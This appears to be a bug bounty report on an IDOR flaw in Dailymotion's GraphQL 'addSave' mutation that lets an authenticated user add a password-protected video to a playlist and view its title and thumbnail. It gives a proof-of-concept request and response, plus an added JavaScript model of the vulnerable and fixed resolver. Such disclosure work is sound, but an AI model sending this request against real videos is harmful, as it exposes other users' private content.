Summary

I discovered an access control vulnerability in Dailymotion that allows an authenticated user who does not know a video's password to view the metadata (title and thumbnail) of that password-protected video. This can be achieved by abusing an IDOR (Insecure Direct Object Reference) issue in the GraphQL mutation that saves videos to a playlist.

Description

Dailymotion provides a feature that allows users to protect their videos with a password. Videos protected by a password are expected to remain fully private, including their metadata, unless the correct password is provided.

However, during security testing, I found that a password-protected video can still be added to a user-controlled playlist by directly referencing its VIDEO_ID via a GraphQL API request. This action does not require the video password and is processed successfully by the backend.

Once added to the playlist, the attacker can view the video title and thumbnail, leading to unauthorized disclosure of private content metadata.

Proof of Concept

Request

POST / HTTP/1.1
Host: graphql.api.dailymotion.com
Authorization: Bearer attacker_token
Content-Type: application/json

{
  "operationName": "ADD_COLLECTION_VIDEO_MUTATION",
  "variables": {
    "input": {
      "collectionId": "PLAYLIST_ID",
      "id": "VIDEO_ID"
    }
  },
  "query": "mutation ADD_COLLECTION_VIDEO_MUTATION($input: SaveInput!) { addSave(input: $input) { status __typename } }"
}

Response

HTTP/1.1 200 OK

{
  "data": {
    "addSave": {
      "status": "SUCCESS",
      "__typename": "SavePayload"
    }
  }
}

The SUCCESS status confirms that the backend allows the operation without validating whether the requester has authorization to access the password-protected video.
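To illustrate the missing check, the following is an added, in-memory model of an addSave-style resolver (not Dailymotion's code): the vulnerable shape authorizes only the playlist, while the hardened shape also requires the caller to be authorized for the video and answers "not found" and "not authorized" identically so the mutation cannot confirm that a protected video exists. Assumed data model: a video has an ownerId and an optional password, and a viewer session records which protected videos it has unlocked; all ids are constructed placeholders.

```javascript
// Added example, not Dailymotion's code: an in-memory model of the addSave
// resolver. Assumed data model: a video has an ownerId and an optional
// password; a viewer session records which protected videos it has unlocked.

function makeSampleStore() {
  // Constructed sample data; ids are hypothetical placeholders.
  return {
    videos: new Map([
      ["vid_public", { ownerId: "user_owner", password: null, title: "Public clip" }],
      ["vid_private", { ownerId: "user_owner", password: "s3cret", title: "Private clip" }],
    ]),
    collections: new Map([
      ["pl_attacker", { ownerId: "user_attacker", videoIds: [] }],
    ]),
  };
}

// A viewer is { userId, unlockedVideoIds: Set } for the authenticated session.
function canAccessVideo(viewer, videoId, video) {
  if (video.password === null) return true;          // not password-protected
  if (video.ownerId === viewer.userId) return true;  // the owner may always
  return viewer.unlockedVideoIds.has(videoId);       // password proven earlier
}

// Vulnerable shape, matching the report: only the playlist is authorized,
// so any VIDEO_ID the caller supplies is accepted.
function addSaveVulnerable(store, viewer, input) {
  const collection = store.collections.get(input.collectionId);
  if (!collection || collection.ownerId !== viewer.userId) return { status: "FORBIDDEN" };
  const video = store.videos.get(input.id);
  if (!video) return { status: "NOT_FOUND" };
  collection.videoIds.push(input.id);
  return { status: "SUCCESS", __typename: "SavePayload" };
}

// Hardened: the video must be readable by the caller too. "Not found" and
// "not authorized" return the same payload so the mutation cannot be used
// to confirm that a protected video exists.
function addSaveHardened(store, viewer, input) {
  const collection = store.collections.get(input.collectionId);
  if (!collection || collection.ownerId !== viewer.userId) return { status: "FORBIDDEN" };
  const video = store.videos.get(input.id);
  if (!video || !canAccessVideo(viewer, input.id, video)) return { status: "NOT_FOUND" };
  collection.videoIds.push(input.id);
  return { status: "SUCCESS", __typename: "SavePayload" };
}
```

The same authorization check must also run wherever the playlist is rendered, since a saved reference that later becomes password-protected would otherwise still expose its title and thumbnail.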

Impact

This vulnerability allows an attacker to:

  • Bypass access control on password-protected videos
  • Confirm the existence of private videos
  • Access sensitive metadata such as:
      • Video title
      • Video thumbnail

Although the video playback itself remains restricted, the exposure of metadata violates user privacy and contradicts the security guarantees of password-protected content.

Timeline

January 20, 2026: Report submitted
January 20, 2026: Under review
January 26, 2026: Closed as Informative
